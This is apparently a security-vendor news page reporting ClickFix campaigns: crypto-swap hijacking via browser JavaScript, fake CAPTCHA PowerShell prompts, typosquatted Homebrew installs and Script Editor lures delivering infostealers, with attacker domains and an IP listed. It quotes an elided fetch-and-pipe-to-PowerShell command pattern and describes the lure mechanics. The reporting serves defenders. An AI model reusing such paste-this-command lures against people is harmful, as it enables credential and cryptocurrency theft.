ClickFix Social Engineering Expands to Browser JavaScript and Terminal Paste Attacks
Threat actors are expanding ClickFix-style social engineering beyond simple “copy/paste this command” lures, including a campaign that abuses Pastebin comments to push victims toward executing attacker-supplied JavaScript in their browser to hijack cryptocurrency swap flows. The Pastebin comments promote a fake “Swapzone.io arbitrage exploit” and route users through a rawtext[.]host link to a Google Doc (“Swapzone.io – ChangeNOW Profit Method”) that instructs users to run JavaScript which can modify the swap process in-session and redirect funds to attacker-controlled wallets; the reporting notes this may be an early example of ClickFix being used to directly alter webpage functionality for theft.
Separately, Objective-See documented ClickFix as a rapidly growing infection technique on macOS and Windows that relies on persuading users to paste attacker-controlled commands into a terminal, enabling execution without exploiting software vulnerabilities and potentially bypassing macOS protections such as Gatekeeper and Notarization. The post describes a practical macOS-focused mitigation that intervenes at “paste time” to disrupt many ClickFix attempts, implemented in BlockBlock, while also outlining limitations and potential bypasses—reinforcing that ClickFix is primarily a user-manipulation problem that defenders should address with both technical controls and user-execution friction.
Timeline
Feb 15, 2026
Researchers document in-browser JavaScript attack targeting Swapzone users
BleepingComputer analyzed the campaign and reported that the first-stage JavaScript loads an obfuscated second-stage payload from rawtext[.]host, which overrides Swapzone's legitimate swap-handling logic. The report described the activity as a notable ClickFix-style campaign using in-browser JavaScript to alter webpage functionality for cryptocurrency theft.
Feb 15, 2026
Threat actors launch Pastebin-based ClickFix crypto swap hijacking campaign
Threat actors began abusing Pastebin comments to lure cryptocurrency users with supposed Swapzone/ChangeNOW arbitrage documentation, directing them to a Google Doc that instructs victims to run malicious JavaScript in their browser. The payload injects code into Swapzone sessions to replace legitimate Bitcoin deposit addresses with attacker-controlled wallets and manipulate displayed swap details.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Organizations
Affected Products
Sources
Related Stories
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 months ago
ClickFix Social-Engineering Campaigns Using Fake CAPTCHA and Fake Installer Pages
Security researchers reported multiple **ClickFix** campaigns that compromise endpoints by tricking users into manually executing attacker-provided commands rather than exploiting a software vulnerability. CERT Polska documented an incident response at a large Polish organization where a **fake CAPTCHA** prompt led a user to run a malicious snippet via *Win+R*, resulting in malware execution and suspected **DLL side-loading** from `%APPDATA%\Intel` (legitimate `igfxSDK.exe`/`version.dll` alongside a suspicious `wtsapi32.dll`). Investigators also identified additional suspicious DLLs in the user’s local AppData and recovered an execution trail consistent with a one-liner that fetched remote content and piped it into PowerShell (e.g., `cmd /c curl ... | powershell`). Separately, threat hunting research described a macOS-focused ClickFix operation using **typosquatted Homebrew** lookalike sites to present a “copy/paste” install command that runs in Terminal. The first-stage script repeatedly prompted for a password and validated it using `dscl authonly` to harvest working credentials before deploying a second-stage infostealer dubbed **Cuckoo Stealer**, which was reported to establish **LaunchAgent** persistence, remove quarantine attributes, and communicate over encrypted HTTPS C2 while targeting browser credentials/session tokens, Keychain data, notes/messaging artifacts, VPN/FTP configs, and cryptocurrency wallets. Both reports highlight ClickFix as an increasingly common, opportunistic initial access technique that scales by abusing trusted user workflows on Windows and macOS.
1 months ago
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.
3 weeks ago